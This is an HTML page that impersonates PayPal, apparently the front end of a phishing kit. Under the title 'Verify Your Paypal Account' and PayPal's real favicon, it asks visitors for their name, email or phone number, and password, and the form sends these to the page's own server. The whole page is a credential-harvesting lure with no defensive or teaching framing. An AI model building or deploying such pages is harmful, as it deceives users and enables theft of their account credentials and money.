<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="static/css/style.css">
    <link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico">
    <title>Verify Your Paypal Account</title>
</head>
<body>

    <center>
        <img src="static/images/download.png" alt="LOGO" class="logo">
        <h3>Please Fill Your Information In The Form Below So We Can Verify Your Account</h3>
        <form action="/" method="post">
            <input type="text" name="name" placeholder="Name">
            <input type="text" name="email" placeholder="Email Or Phone Number">
            <input type="text" name="password" placeholder="Password">
            <input type="text" placeholder="Confirm Password">
            <input name="submit" class="sub" type="submit" value="Proceed">
        </form>
    </center>

</body>
</html>
